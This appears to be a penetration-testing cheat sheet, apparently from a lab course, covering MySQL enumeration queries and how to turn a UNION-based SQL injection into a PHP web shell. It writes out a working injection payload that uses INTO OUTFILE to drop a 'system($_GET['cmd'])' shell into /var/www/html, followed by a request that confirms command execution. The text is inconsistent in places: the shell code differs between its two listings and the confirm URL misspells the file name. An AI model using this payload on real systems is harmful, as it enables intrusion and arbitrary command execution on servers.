MySQL
Connecting to Remote Server
mysql -u user -p -h ip_addressVerify Current User
select system_user();Show Databases
show databases;Select Database to Query
use <db_name>Show Tables
show tables;Show Just Column Names in Specific Table
select column_name from information_schema.columns where table_name = 'users';+---------------------+
| COLUMN_NAME |
---------------------+
| CURRENT_CONNECTIONS |
| TOTAL_CONNECTIONS |
| USER |
| id |
| username |
---------------------+Selecting Specific Items from Table
select id,username from users;+----+--------------------------------------+
| id | username |
----+--------------------------------------+
| 1 | yoshi |
| 2 | luigi |
| 3 | wario |
| 4 | OS{5a8b9b9bf9b8b4c0e85b81aa63cb4b15} |
| 5 | mario |
----+--------------------------------------+Writing Files on the Web Server
-
Although the various MySQL database variants don't offer a single function to escalate to RCE, we can abuse the
SELECT INTO_OUTFILE
statement to write files on the web server.
- This file MUST be writable by the user running running the database software
Example VIA UNION SELECT Statement
-
We'll issue the UNION SELECT SQL keywords to include a single PHP line into the first column and save it as
webshell.phpin a writable web folder.
' UNION SELECT "<?php system($_GET['cmd']);?>", null, null, null, null INTO OUTFILE "/var/www/html/tmp/webshell.php" -- //Written PHP Code
<? system($_REQUEST['cmd']); ?>-
The PHP system function will parse any statement included in the
cmdparameter coming from the client HTTP REQUEST, thus acting like a web-interactive command shell.
Confirming Web Shell
http://192.168.120.19/tmp/websehll.php?cmd=id